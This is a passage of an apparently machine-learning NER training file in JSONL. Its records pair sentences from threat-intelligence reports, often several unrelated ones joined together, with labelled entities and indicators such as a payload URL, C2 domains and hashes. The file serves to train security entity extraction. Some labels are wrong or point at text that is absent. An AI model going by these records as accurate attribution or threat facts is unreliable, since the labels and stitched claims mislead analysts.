In this campaign , the malware author uses the following name: Pyongyang Directory Group email April 2017 RC_Office_Coordination_Associate.scr. The decoy document shown after infection is an Office document containing email addresses , phone numbers and contacts of members of official organizations such as the United Nations , UNICEF , Embassies linked to North Korea .", "spans": {"ORGANIZATION: Trend Micro": [[297, 308]], "THREAT_ACTOR: MuddyWater’s": [[323, 335]], "MALWARE: POWERSTATS v3": [[394, 407]], "FILEPATH: RC_Office_Coordination_Associate.scr.": [[516, 553]], "TOOL: Office": [[601, 607]], "TOOL: email": [[628, 633]], "ORGANIZATION: official organizations": [[687, 709]], "ORGANIZATION: United Nations": [[722, 736]], "ORGANIZATION: UNICEF": [[739, 745]], "ORGANIZATION: Embassies": [[748, 757]]}, "info": {"id": "cyberner_stix_train_005270", "source": "cyberner_stix_train"}} {"text": "This file discusses the supposed announcement banning the rival Fatah political party , which controls the West Bank , from Gaza .", "spans": {"ORGANIZATION: Fatah": [[64, 69]]}, "info": {"id": "cyberner_stix_train_005271", "source": "cyberner_stix_train"}} {"text": "When a victim tries to access the URL in the SMS body , the C2 will check if the mobile device meets the criteria to receive the malware ( see infrastructure section ) . APT10 withdrew from direct targeting using Poison Ivy in 2013 and conducted its first known retooling operation , upgrading its capabilities and replatforming to use PlugX . OceanLotus : background.ristians.com:8888 11b4 . 
They contain some invalid URLs and IPs .", "spans": {"THREAT_ACTOR: APT10": [[170, 175]], "TOOL: Poison Ivy": [[213, 223]], "TOOL: PlugX": [[336, 341]], "THREAT_ACTOR: OceanLotus": [[344, 354]], "DOMAIN: background.ristians.com:8888": [[357, 385]]}, "info": {"id": "cyberner_stix_train_005272", "source": "cyberner_stix_train"}} {"text": "CTU researchers found no evidence of multiple operators working simultaneously against a single organization .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_005273", "source": "cyberner_stix_train"}} {"text": "URL Status IP Domain registration date http : //ora.studiolegalebasili [ . As Proofpoint has not yet observed this attack in the wild it is likely that there is an additional component that leads to the execution of the MSIL payload . FireEye 's publication of \" Operation Saffron Rose \" report , which described Flying Kitten 's operations against aviation firms , led to the dismantling of Flying Kitten 's infrastructure and the apparent end of its activities .", "spans": {"ORGANIZATION: Proofpoint": [[78, 88]], "MALWARE: MSIL payload": [[220, 232]], "ORGANIZATION: FireEye": [[235, 242]], "THREAT_ACTOR: Flying Kitten": [[313, 326], [392, 405]], "ORGANIZATION: aviation firms": [[349, 363]]}, "info": {"id": "cyberner_stix_train_005274", "source": "cyberner_stix_train"}} {"text": "Windows Defender ATP provides extensive information about activity groups responsible for the attacks , enabling customers to understand aspects of the attack that may not be obtained by network and endpoint sensors , such as common social engineering lures and the regional nature of an attack .", "spans": {"TOOL: Windows Defender ATP": [[0, 20]]}, "info": {"id": "cyberner_stix_train_005275", "source": "cyberner_stix_train"}} {"text": "String Resources Used to Store App Data Red Alert 2.0 stores its data in an atypical location ( inside the Strings.xml file embedded in the app ) to fetch its critical data , such as the 
C2 address . However , we asses with medium confidence that NavRAT is linked to Group123 . was applied to APT10 ANEL and Dharma ransomware packer . Another area where we may want to consider this motivation is the human factor .", "spans": {"MALWARE: Red Alert 2.0": [[40, 53]], "TOOL: NavRAT": [[247, 253]], "THREAT_ACTOR: Group123": [[267, 275]], "THREAT_ACTOR: APT10": [[293, 298]], "MALWARE: ANEL": [[299, 303]], "MALWARE: Dharma": [[308, 314]]}, "info": {"id": "cyberner_stix_train_005276", "source": "cyberner_stix_train"}} {"text": "While both RTM and Buhtrap are looking for a quite similar process list , the infection vectors are quite different . Based on analysis of the data and malware samples we have collected , Unit 42 believes the attacks described herein are the work of a group or set of cooperating groups who have a single mission , collecting information on minority groups who reside in and around northwestern China .", "spans": {"TOOL: RTM": [[11, 14]], "TOOL: Buhtrap": [[19, 26]], "ORGANIZATION: Unit 42": [[188, 195]], "THREAT_ACTOR: groups": [[280, 286]], "ORGANIZATION: minority groups": [[341, 356]]}, "info": {"id": "cyberner_stix_train_005277", "source": "cyberner_stix_train"}} {"text": "The main purpose of this module is to exfiltrate Skype call recordings . In mid-September , an app named ‘Network Speed Master’ stood out on our radar with its rather unusual behavior patterns . 
Leviathan : TEMP.Jumper , APT40 , TEMP.Periscope .", "spans": {"SYSTEM: Skype": [[49, 54]], "THREAT_ACTOR: ‘Network Speed Master’": [[105, 127]], "THREAT_ACTOR: Leviathan": [[195, 204]], "THREAT_ACTOR: TEMP.Jumper": [[207, 218]], "THREAT_ACTOR: APT40": [[221, 226]], "THREAT_ACTOR: TEMP.Periscope": [[229, 243]]}, "info": {"id": "cyberner_stix_train_005278", "source": "cyberner_stix_train"}} {"text": "The payment portal was initially similar to the one used by Locky and Bart .", "spans": {"MALWARE: Locky": [[60, 65]], "MALWARE: Bart": [[70, 74]]}, "info": {"id": "cyberner_stix_train_005279", "source": "cyberner_stix_train"}} {"text": "SHA256 : 905f6a62749ca6f0fd33345d6a8b1831d87e9fd1f81a59cd3add82643b367693 .", "spans": {"FILEPATH: 905f6a62749ca6f0fd33345d6a8b1831d87e9fd1f81a59cd3add82643b367693": [[9, 73]]}, "info": {"id": "cyberner_stix_train_005280", "source": "cyberner_stix_train"}} {"text": "Botnets can make considerably more money than autonomous Trojans . TAA not only flagged this malicious use of PsExec , it also told us what the attackers were using it for . Since this compilation timestamp dates back two weeks before this campaign , it ’s likely that it has n’t been tampered with by the attackers . 
An example of these log entries can be found below : By correlating the user , IP address and GUID from the Remote PowerShell HTTP logs to the Exchange frontend , CrowdStrike found a request using the mailbox to the following OWA URL , , corresponding to the IIS log entry below : The backend request for the new exploitation chain is similar to the example shown below : This request seemed to show a novel , previously undocumented , way to reach the PowerShell remoting service through the OWA frontend endpoint , instead of leveraging the endpoint .", "spans": {"ORGANIZATION: TAA": [[67, 70]], "TOOL: PsExec": [[110, 116]]}, "info": {"id": "cyberner_stix_train_005281", "source": "cyberner_stix_train"}} {"text": "Like the photo displayed in the first decoy file we found , this document references the death of Mazen Fuqaha .", "spans": {}, "info": {"id": "cyberner_stix_train_005282", "source": "cyberner_stix_train"}} {"text": "PROMETHIUM and NEODYMIUM both used an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player that , at the time , was both unknown and unpatched . If the hypothesis is correct and the Turla threat group is using Kazuar , we believe they may be using it as a replacement for Carbon and its derivatives .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[0, 10]], "THREAT_ACTOR: NEODYMIUM": [[15, 24]], "VULNERABILITY: CVE-2016-4117": [[50, 63]], "THREAT_ACTOR: Turla": [[195, 200]], "MALWARE: Kazuar": [[223, 229]], "MALWARE: Carbon": [[285, 291]]}, "info": {"id": "cyberner_stix_train_005283", "source": "cyberner_stix_train"}} {"text": "http://188.241.58.170/live/owa/office.dotm .", "spans": {"URL: http://188.241.58.170/live/owa/office.dotm": [[0, 42]]}, "info": {"id": "cyberner_stix_train_005284", "source": "cyberner_stix_train"}} {"text": "In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers , email clients , messengers , etc , and can act as a keylogger . 
So far , it appears threat actors have deployed the Bookworm Trojan primarily in attacks on targets in Thailand .", "spans": {"MALWARE: AveMaria": [[10, 18]], "MALWARE: Bookworm Trojan": [[246, 261]]}, "info": {"id": "cyberner_stix_train_005285", "source": "cyberner_stix_train"}} {"text": "The malicious application da.hao.pao.bin ( Chunghwa Post ) loads a library file libmsy.so used to execute the packed mycode.jar file . Of particular note is their use of tools to identify systems vulnerable to CVE-2017-0144 , which is the same vulnerability exploited by EternalBlue that is best known for its use in the WannaCry attacks of 2017 . Overall , in spite of the lack of sophistication in Gorgon Group 's activity , they were still relatively successful ; once again proving that simple attacks on individuals without proper protections , work .", "spans": {"ORGANIZATION: Chunghwa Post": [[43, 56]], "VULNERABILITY: CVE-2017-0144": [[210, 223]], "THREAT_ACTOR: Gorgon Group": [[400, 412]]}, "info": {"id": "cyberner_stix_train_005286", "source": "cyberner_stix_train"}} {"text": "Next , the malware enumerates all .exe programs in the % System % folder and looks for an original signed Windows binary that imports from at least one KnownDll and from a library that is not in the KnownDll directory . The connections associated with these profiles indicate the threat actor began using the persona to target organizations in April 2016 . 
Some of these names include processes related to security software : Ashley Madison ’s long - suspected army of fake female accounts came to the fore in August 2012 after the former sex worker turned activist and blogger Maggie McNeill published screenshots apparently taken from Ashley Madison ’s internal systems suggesting that a large percentage of the female accounts on the service were computer - operated bots .", "spans": {"SYSTEM: Windows": [[106, 113]], "THREAT_ACTOR: threat actor": [[280, 292]], "ORGANIZATION: Ashley Madison": [[426, 440]], "ORGANIZATION: Maggie McNeill": [[578, 592]], "SYSTEM: Ashley Madison ’s internal systems": [[637, 671]], "ORGANIZATION: female accounts": [[714, 729]]}, "info": {"id": "cyberner_stix_train_005287", "source": "cyberner_stix_train"}} {"text": "Many of these servers are control panels for video surveillance systems developed by the Italian company eSurv , based in Catanzaro , in Calabria , Italy . Taidoor actively sent out malicious documents and maintained several IP addresses for command and control . This is why we chose to name the malware Pierogi , after the popular East European dish . Talos discovered multiple vulnerabilities in Foxit PDF Reader that could allow an adversary to execute , arbitrary code on the targeted machine .", "spans": {"MALWARE: Pierogi": [[305, 312]], "ORGANIZATION: Talos": [[354, 359]], "TOOL: Foxit PDF Reader": [[399, 415]]}, "info": {"id": "cyberner_stix_train_005288", "source": "cyberner_stix_train"}} {"text": "In the case of this ransomware , using the model would ensure that its ransom note—typically fake police notice or explicit images supposedly found on the device—would appear less contrived and more believable , increasing the chances of the user paying for the ransom . In this report , we present the historical intelligence we have gathered on the Ke3chang campaign , as well as an in-depth assessment of the ongoing Syrian-themed attacks against these MFAs . 
New patterns and data-flow tracking for opaque predicates . An adversary could potentially instruct a control systems device to perform an action that will cause an Impact", "spans": {"VULNERABILITY: An adversary could potentially instruct a control systems device to perform an action that will cause an Impact": [[523, 634]]}, "info": {"id": "cyberner_stix_train_005289", "source": "cyberner_stix_train"}} {"text": "Although Poison Ivy has been a proven threat for some time , the delivery mechanism for this backdoor uses recent publicly available techniques that differ from previously observed campaigns .", "spans": {"VULNERABILITY: Poison Ivy": [[9, 19]]}, "info": {"id": "cyberner_stix_train_005290", "source": "cyberner_stix_train"}} {"text": "If the device does not meet the criteria , it wo n't receive any data , otherwise , it will be redirected to a second server to receive a copy of the malware to install on their device . It is highly likely that this is due to the release of the 2013 FireEye report . OceanLotus : enum.arkoorr.com:8531 11b4 . Open Babel allows users to “ search , convert , analyze , or store data from molecular modeling , chemistry , solid - state materials , biochemistry , or related areas , ” according to its website , and is used in other popular pieces of software in the science field .", "spans": {"ORGANIZATION: FireEye": [[251, 258]], "THREAT_ACTOR: OceanLotus": [[268, 278]], "DOMAIN: enum.arkoorr.com:8531": [[281, 302]], "TOOL: Open Babel": [[310, 320]]}, "info": {"id": "cyberner_stix_train_005291", "source": "cyberner_stix_train"}} {"text": "Shutdown / restart the computer .", "spans": {}, "info": {"id": "cyberner_stix_train_005292", "source": "cyberner_stix_train"}} {"text": "The examples below show the plaintext key “ TEST ” to decrypt encoded hexadecimal strings ( jUtils.decrypt ( ) ) . 
Interestingly , this actor targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center . Ke3chang attackers are operating within China .", "spans": {"THREAT_ACTOR: actor": [[136, 141]], "ORGANIZATION: financial": [[151, 160]], "THREAT_ACTOR: Ke3chang": [[307, 315]], "THREAT_ACTOR: attackers": [[316, 325]]}, "info": {"id": "cyberner_stix_train_005293", "source": "cyberner_stix_train"}} {"text": "GeminiDuke and CozyDuke on the other hand appear to have been less used in actual operations , but did undergo much more significant development .", "spans": {"MALWARE: GeminiDuke": [[0, 10]], "MALWARE: CozyDuke": [[15, 23]]}, "info": {"id": "cyberner_stix_train_005294", "source": "cyberner_stix_train"}} {"text": "'' Package permissions The trojan declares numerous permissions in the manifest , from which we should highlight the BIND_DEVICE_ADMIN , which provides nearly full control of the device to the trojan . The attacker obtains the required privileges and launches a few other tools to modify the access control lists (ACLs) of all websites running on the affected server . While not conclusive by itself , the use of publicly available Iranian hacking tools and popular Iranian hosting companies may be a result of APT33 's familiarity with them and lends support to the assessment that APT33 may be based in Iran .", "spans": {"THREAT_ACTOR: attacker": [[206, 214]], "ORGANIZATION: hosting companies": [[474, 491]], "THREAT_ACTOR: APT33": [[511, 516], [583, 588]]}, "info": {"id": "cyberner_stix_train_005295", "source": "cyberner_stix_train"}} {"text": "] today shop [ . The name Mofang is based on the Mandarin verb , which means to imitate . 
Backdoor.APT.Aumlib : In subsequent investigations , we observed malicious files created by w3wp.exe , the process responsible for the Exchange Server web front - end .", "spans": {"THREAT_ACTOR: Mofang": [[26, 32]], "FILEPATH: Backdoor.APT.Aumlib": [[90, 109]], "TOOL: w3wp.exe": [[182, 190]]}, "info": {"id": "cyberner_stix_train_005296", "source": "cyberner_stix_train"}} {"text": "Germany 's Christian Democratic Union ( CDU ) :", "spans": {"ORGANIZATION: Christian Democratic Union": [[11, 37]], "ORGANIZATION: CDU": [[40, 43]]}, "info": {"id": "cyberner_stix_train_005297", "source": "cyberner_stix_train"}} {"text": "Wells Fargo Mobile com.whatsapp WhatsApp com.yahoo.mobile.client.android.mail Yahoo Mail – Organized Email fr.banquepopulaire.cyberplus Banque Populaire fr.creditagricole.androidapp Ma Banque jp.co.rakuten_bank.rakutenbank 楽天銀行 -個人のお客様向けアプリ mobi.societegenerale.mobile.lappli L ’ Appli Société Générale net.bnpparibas.mescomptes Mes Comptes BNP Paribas org.telegram.messenger Telegram Triout - Spyware Framework SectorJ04 used the spear phishing email to spread malicious Excel or malicious Word files , and downloaded the MSI files from the attacker’s server when the malicious documents were run . 
Carbanak is a backdoor used by the attackers to compromise the victim .", "spans": {"SYSTEM: Wells Fargo Mobile": [[0, 18]], "SYSTEM: WhatsApp": [[32, 40]], "SYSTEM: Yahoo Mail": [[78, 88]], "SYSTEM: Banque": [[136, 142]], "SYSTEM: Ma Banque": [[182, 191]], "MALWARE: Triout": [[385, 391]], "THREAT_ACTOR: SectorJ04": [[412, 421]], "THREAT_ACTOR: attacker’s": [[542, 552]], "FILEPATH: Carbanak": [[600, 608]], "MALWARE: backdoor": [[614, 622]], "THREAT_ACTOR: attackers": [[635, 644]]}, "info": {"id": "cyberner_stix_train_005298", "source": "cyberner_stix_train"}} {"text": "All of these connected domains follow a pattern similar to phishing attacks masquerading as legitimate services – in this case “ online.verify.paypal ” ( 588 ) and “ hmrc.secure.refund ” ( 1021 ) .", "spans": {}, "info": {"id": "cyberner_stix_train_005299", "source": "cyberner_stix_train"}} {"text": "A search of the name IT Worx brings up a global software professional services organization headquartered in Egypt .", "spans": {"ORGANIZATION: IT Worx": [[21, 28]], "ORGANIZATION: global software professional services organization": [[41, 91]]}, "info": {"id": "cyberner_stix_train_005300", "source": "cyberner_stix_train"}} {"text": "We would like to emphasize that this method of attack only works on Windows XP and Android versions prior to 2.2 . TClient is actually one of Tropic Trooper 's other backdoors . Even though it ’s probably coincidental , the date within the config corresponds to the date of the first detection of this sample at the corresponding university . 
CrowdStrike security researchers were working to develop proof - of - concept ( POC ) code for an exploit method indicative of the logging present after recent Play ransomware attacks .", "spans": {"SYSTEM: Windows XP": [[68, 78]], "SYSTEM: Android": [[83, 90]], "TOOL: TClient": [[115, 122]], "ORGANIZATION: CrowdStrike security researchers": [[343, 375]]}, "info": {"id": "cyberner_stix_train_005301", "source": "cyberner_stix_train"}} {"text": "Multiple factors suggest that this activity is Russian in origin and associated with CNIIHM .", "spans": {"ORGANIZATION: CNIIHM": [[85, 91]]}, "info": {"id": "cyberner_stix_train_005302", "source": "cyberner_stix_train"}} {"text": "Depending on the intent triggered , one of two Receivers would be called , in this instance they are called Boot or Time but the name is somewhat immaterial . We believe these operations include broadly malicious activity that can enable further operations , such as targeting game source code and compromising digital certificates , while other activities are explicitly financially motivated , such as abusing in-game currency mechanics . Since releasing our 2014 report , we continue to assess that APT28 is sponsored by the Russian government .", "spans": {"TOOL: game source code": [[277, 293]], "TOOL: digital certificates": [[311, 331]], "THREAT_ACTOR: APT28": [[502, 507]], "ORGANIZATION: Russian government": [[528, 546]]}, "info": {"id": "cyberner_stix_train_005303", "source": "cyberner_stix_train"}} {"text": "Figure 3 . Additionally , the targeting of a French diplomat based in Taipei , Taiwan aligns with previous targeting by these actors , as does the separate infrastructure . The C&C server was not responding during our analysis . 
A typical web request to the frontend to exploit the SSRF vulnerability on CVE-2022 - 41040 involves some variation of path confusion that references the endpoint as shown below : The backend request for a typical ProxyNotShell exploitation is shown below : Once the PowerShell remoting service can be reached , the second step involves vulnerability CVE-2022 - 41082 being exploited in order to execute arbitrary commands .", "spans": {"ORGANIZATION: French diplomat": [[45, 60]], "THREAT_ACTOR: actors": [[126, 132]], "VULNERABILITY: SSRF vulnerability": [[282, 300]], "VULNERABILITY: CVE-2022 - 41040": [[304, 320]], "VULNERABILITY: ProxyNotShell": [[443, 456]], "VULNERABILITY: PowerShell remoting service": [[496, 523]], "VULNERABILITY: CVE-2022 - 41082": [[580, 596]]}, "info": {"id": "cyberner_stix_train_005304", "source": "cyberner_stix_train"}} {"text": "Wolf Research claimed to shut down their operations but we clearly see that their previous work continues under another guise . Subdomains at phmail.us have been linked to malicious activity dating back as far as December 2011 . Similarly , the public disclosure of APT12 ’s intrusion at the New York Times also led to only a brief pause in the threat group ’s activity and immediate changes in TTPs . However , the template source code is quite different and the payload delivery uses different infrastructure .", "spans": {"THREAT_ACTOR: APT12": [[266, 271]], "ORGANIZATION: New York Times": [[292, 306]]}, "info": {"id": "cyberner_stix_train_005305", "source": "cyberner_stix_train"}} {"text": "APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making . 
One possible hit was triggered when we observed Mevade , an unusual piece of malware that appeared late in 2013 .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]], "ORGANIZATION: aviation": [[18, 26]], "ORGANIZATION: military": [[90, 98], [175, 183]]}, "info": {"id": "cyberner_stix_train_005306", "source": "cyberner_stix_train"}} {"text": "However , their strategy , tactics , techniques , and procedures in this particular attack emphasize the importance of rigorous patching regimens for all organizations .", "spans": {}, "info": {"id": "cyberner_stix_train_005307", "source": "cyberner_stix_train"}} {"text": "The downloaded file is an archive file ( .r23 ) , that contains a Windows executable file with the same name as the PDF and with a fake Microsoft Word icon .", "spans": {"FILEPATH: .r23": [[41, 45]], "SYSTEM: Windows": [[66, 73]], "TOOL: PDF": [[116, 119]], "ORGANIZATION: Microsoft": [[136, 145]], "TOOL: Word": [[146, 150]]}, "info": {"id": "cyberner_stix_train_005308", "source": "cyberner_stix_train"}} {"text": "] top/ Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817465 [ . Captured legitimate user credentials when users interacted with these actor - controlled servers . PittyTiger is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control .", "spans": {"THREAT_ACTOR: actor": [[136, 141]], "THREAT_ACTOR: PittyTiger": [[165, 175]]}, "info": {"id": "cyberner_stix_train_005309", "source": "cyberner_stix_train"}} {"text": "The creators of the Spark backdoor use several techniques to evade detection and stay under the radar .", "spans": {"MALWARE: Spark backdoor": [[20, 34]]}, "info": {"id": "cyberner_stix_train_005310", "source": "cyberner_stix_train"}} {"text": "It is dropped by at least one of the weaponised documents17 used in the MONSOON campaign where it is embedded inside another executable . 
Chapter 7 explains the working of Mofang 's preferred tools : ShimRat and SimRatReporter .", "spans": {"TOOL: documents17": [[48, 59]], "MALWARE: ShimRat": [[200, 207]], "MALWARE: SimRatReporter": [[212, 226]]}, "info": {"id": "cyberner_stix_train_005311", "source": "cyberner_stix_train"}} {"text": "Jaff was not dramatically different from other ransomware strains .", "spans": {"MALWARE: Jaff": [[0, 4]]}, "info": {"id": "cyberner_stix_train_005312", "source": "cyberner_stix_train"}} {"text": "In addition , just as uncovering new characteristics is important , finding ones we ’ ve also seen in a different malware family like FakeSpy also provides valuable insight . APT28 's malware settings suggest that the developers have done the majority of their work in a Russian language build environment during Russian business hours , which suggests that the Russian government is APT28 's sponsor . Similar to PoisonFrog , the last digit of the received file name determines how the content of the file is . Imagine you got an email that looked like it was from a friend .", "spans": {"MALWARE: FakeSpy": [[134, 141]], "THREAT_ACTOR: APT28": [[175, 180], [384, 389]], "MALWARE: PoisonFrog": [[414, 424]]}, "info": {"id": "cyberner_stix_train_005313", "source": "cyberner_stix_train"}} {"text": "July 11 Two new Flash zero-day vulnerabilities , CVE-2015-5122 and CVE-2015-5123 , were found in the hacking team dump . The hacking group misused Cobalt Strike , for instance , to perpetrate ATM cyber heists and target financial institutions across Europe , and interestingly , Russia . 
as the result was not correct in MMAT_CALLS ( detecting call arguments ) CrowdStrike security researchers were working to develop proof - of - concept ( POC ) code for an exploit method indicative of the logging present after recent Play ransomware attacks .", "spans": {"VULNERABILITY: Flash zero-day vulnerabilities": [[16, 46]], "VULNERABILITY: CVE-2015-5122": [[49, 62]], "VULNERABILITY: CVE-2015-5123": [[67, 80]], "THREAT_ACTOR: hacking group": [[125, 138]], "TOOL: Cobalt Strike": [[147, 160]], "THREAT_ACTOR: cyber heists": [[196, 208]], "ORGANIZATION: financial institutions": [[220, 242]], "TOOL: MMAT_CALLS": [[321, 331]], "ORGANIZATION: CrowdStrike security researchers": [[361, 393]]}, "info": {"id": "cyberner_stix_train_005314", "source": "cyberner_stix_train"}} {"text": "This data structure is 24 bytes and is composed of some fixed fields and a variable portion that depends on the opcode . The Lotus Blossom largely targets military or government , with some cases of higher education and high tech companies . Winnti : dac0bd8972f23c9b5f7f8f06c5d629eac7926269 Tue Nov 27 03:05:16 2018 1729131071 8272c1f4 . 
According to Kaspersky telemetry , targeted organizations included think tanks and individuals working in various areas related to security and geopolitics .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[125, 138]], "ORGANIZATION: military": [[155, 163]], "ORGANIZATION: government": [[167, 177]], "ORGANIZATION: higher education": [[199, 215]], "ORGANIZATION: high tech companies": [[220, 239]], "THREAT_ACTOR: Winnti": [[242, 248]], "FILEPATH: dac0bd8972f23c9b5f7f8f06c5d629eac7926269": [[251, 291]], "ORGANIZATION: Kaspersky": [[352, 361]], "ORGANIZATION: think tanks": [[406, 417]], "ORGANIZATION: individuals working in various areas related to security and geopolitics": [[422, 494]]}, "info": {"id": "cyberner_stix_train_005315", "source": "cyberner_stix_train"}} {"text": "The main bot is responsible for persistence , the downloading of additional modules , loading affiliate payloads , and loading updates for the malware .", "spans": {}, "info": {"id": "cyberner_stix_train_005316", "source": "cyberner_stix_train"}} {"text": "Malware that enslaves devices to form botnets needs to be able to receive updated instructions . In November 2015 , the group started to focus on North American users , mostly in the United States . However , from this it 's only clear that Lazarus might have attacked Polish banks .", "spans": {"THREAT_ACTOR: group": [[120, 125]], "THREAT_ACTOR: Lazarus": [[241, 248]], "ORGANIZATION: banks": [[276, 281]]}, "info": {"id": "cyberner_stix_train_005317", "source": "cyberner_stix_train"}} {"text": "Mitigations XLoader will not download malicious apps if the Android device uses a mobile data connection . In order to permit their fraudulent withdrawals from ATMs , Lazarus inject a malicious Advanced Interactive eXecutive (AIX) executable into a running , legitimate process on the switch application server of a financial transaction network , in this case a network handling ATM transactions . 
The peculiarity of this recent attack wave is it actually hit a company not strictly in the Banking or Retail sector , as they recently did , suggesting the threat group could be potentially widening their current operations .", "spans": {"MALWARE: XLoader": [[12, 19]], "THREAT_ACTOR: Lazarus": [[167, 174]], "TOOL: (AIX)": [[225, 230]]}, "info": {"id": "cyberner_stix_train_005318", "source": "cyberner_stix_train"}} {"text": "Whitefly configures multiple C&C domains for each target . FireEye iSIGHT Intelligence confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims .", "spans": {"THREAT_ACTOR: Whitefly": [[0, 8]], "ORGANIZATION: FireEye iSIGHT Intelligence": [[59, 86]], "THREAT_ACTOR: APT37": [[133, 138]], "VULNERABILITY: zero-day": [[151, 159]], "TOOL: Adobe Flash": [[160, 171]], "VULNERABILITY: CVE-2018-4878": [[188, 201]], "MALWARE: DOGCALL": [[218, 225]], "MALWARE: malware": [[226, 233]]}, "info": {"id": "cyberner_stix_train_005319", "source": "cyberner_stix_train"}} {"text": "Figure 4 . One of the most notable functions of the initial dropper is to bypass Windows UAC ( User Account Control ) in order to execute the next payload with higher privileges . We were able to obtain four different modules during the investigation . Ransomware - as - a - service is a relatively new version of these commodity groups , such as DarkSide , known for the cyber attack in 2021 that disrupted the Colonial oil pipeline and made gas more expensive for thousands of U.S. 
consumers .", "spans": {"TOOL: dropper": [[60, 67]], "THREAT_ACTOR: Ransomware - as - a - service": [[253, 282]], "THREAT_ACTOR: DarkSide": [[347, 355]]}, "info": {"id": "cyberner_stix_train_005320", "source": "cyberner_stix_train"}} {"text": "These 2 techniques have also been previously used by this actor .", "spans": {}, "info": {"id": "cyberner_stix_train_005321", "source": "cyberner_stix_train"}} {"text": "This blunder made by the company has been frustrating to many developers . TG-3390 's activities indicate a preference for leveraging SWCs and scan-and-exploit techniques to compromise target systems . In November 2019 , we discovered a new campaign run by the Winnti Group against two Hong Kong universities . The discovery of COSMICENERGY illustrates that the barriers to entry for developing offensive OT capabilities are lowering as actors leverage knowledge from prior attacks to develop new malware .", "spans": {"THREAT_ACTOR: Winnti Group": [[261, 273]], "MALWARE: COSMICENERGY": [[328, 340]], "THREAT_ACTOR: actors": [[437, 443]]}, "info": {"id": "cyberner_stix_train_005322", "source": "cyberner_stix_train"}} {"text": "Figure 9 . In a recent attack , APT33 sent spear-phishing emails to workers in the aviation industry . It’s worth noting that the XOR key is not hardcoded , but instead is read from the first byte of the C:\\Windows\\system.ini file . 
Based on these findings , CrowdStrike assesses it is highly likely that the OWA technique employed is in fact tied to CVE-2022 - 41080 .", "spans": {"THREAT_ACTOR: APT33": [[32, 37]], "ORGANIZATION: aviation industry": [[83, 100]], "TOOL: XOR": [[130, 133]], "FILEPATH: C:\\Windows\\system.ini": [[204, 225]], "ORGANIZATION: CrowdStrike": [[259, 270]], "VULNERABILITY: CVE-2022 - 41080": [[351, 367]]}, "info": {"id": "cyberner_stix_train_005323", "source": "cyberner_stix_train"}} {"text": "The macro executes this payload in a rather interesting way by loading the dropped ~temp.docm document and calling a function within its embedded macro to run the payload .", "spans": {"TOOL: macro": [[4, 9]], "FILEPATH: ~temp.docm": [[83, 93]]}, "info": {"id": "cyberner_stix_train_005324", "source": "cyberner_stix_train"}} {"text": "IOCs SHA256 0ca09d4fde9e00c0987de44ae2ad51a01b3c4c2c11606fe8308a083805760ee7 4378f3680ff070a1316663880f47eba54510beaeb2d897e7bbb8d6b45de63f96 76c9d8226ce558c87c81236a9b95112b83c7b546863e29b88fec4dba5c720c0b 7cc2d8d43093c3767c7c73dc2b4daeb96f70a7c455299e0c7824b4210edd6386 We also believe that both clusters of activity have links to attacks with likely Indian origins , the CONFUCIUS_A attacks are linked to the use of SNEEPY/BYEBYESHELL and the CONFUCIUS_B have a loose link to Hangover . 
We believe APT40 's emphasis on maritime issues and naval technology ultimately support China 's ambition to establish a blue-water navy .", "spans": {"TOOL: SNEEPY/BYEBYESHELL": [[419, 437]], "MALWARE: CONFUCIUS_B": [[446, 457]], "TOOL: Hangover": [[479, 487]], "THREAT_ACTOR: APT40": [[501, 506]], "ORGANIZATION: naval technology": [[542, 558]]}, "info": {"id": "cyberner_stix_train_005325", "source": "cyberner_stix_train"}} {"text": "We analyzed the document to determine the reason that the malicious Flash object only ran when the user scrolled to the third page .", "spans": {"TOOL: Flash": [[68, 73]]}, "info": {"id": "cyberner_stix_train_005326", "source": "cyberner_stix_train"}} {"text": "By comparison , the DataLust ransomware demanded merely $ 15 . Silence 's main targets are located in Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan . Since the beginning of 2019 , we have collected more than 1300 samples and extracted more than 130 C2s . Monitor for contextual data about an account , which may include a username , user ID , environmental data that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"MALWARE: DataLust": [[20, 28]]}, "info": {"id": "cyberner_stix_train_005327", "source": "cyberner_stix_train"}} {"text": "We observed actors installing webshells to the SharePoint server that they use to run commands and upload additional tools to in order to dump credentials and move laterally to other systems on the network .", "spans": {"TOOL: SharePoint": [[47, 57]]}, "info": {"id": "cyberner_stix_train_005328", "source": "cyberner_stix_train"}} {"text": "Post-April 2019 : Starting from early 2019 , the new infection rate of “ Agent Smith ” dropped significantly . At first glance CONFUCIUS_B looks very similar to CONFUCIUS_A , and they are also packaged in plain SFX binary files . Dexphot : 65eac7f9b67ff69cefed288f563b4d77917c94c410c6c6c4e4390db66305ca2a . 
Last week , the Biden administration released its formal roadmap for its national cybersecurity initiative meant to encourage greater investment in cybersecurity and strengthen the U.S. ’s critical infrastructure security ( and more ) .", "spans": {"MALWARE: Agent Smith": [[73, 84]], "MALWARE: CONFUCIUS_B": [[127, 138]], "MALWARE: CONFUCIUS_A": [[161, 172]], "TOOL: SFX binary files": [[211, 227]], "MALWARE: Dexphot": [[230, 237]], "FILEPATH: 65eac7f9b67ff69cefed288f563b4d77917c94c410c6c6c4e4390db66305ca2a": [[240, 304]], "ORGANIZATION: Biden administration": [[323, 343]]}, "info": {"id": "cyberner_stix_train_005329", "source": "cyberner_stix_train"}} {"text": "In March and April 2018 , Volexity identified multiple spear phishing campaigns attributed to Patchwork , an Indian APT group also known as Dropping Elephant . he Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information .", "spans": {"ORGANIZATION: Volexity": [[26, 34]], "THREAT_ACTOR: Patchwork": [[94, 103]], "THREAT_ACTOR: APT group": [[116, 125]], "THREAT_ACTOR: Dropping Elephant": [[140, 157]], "ORGANIZATION: Tibetan community": [[163, 180]], "MALWARE: malware": [[250, 257]]}, 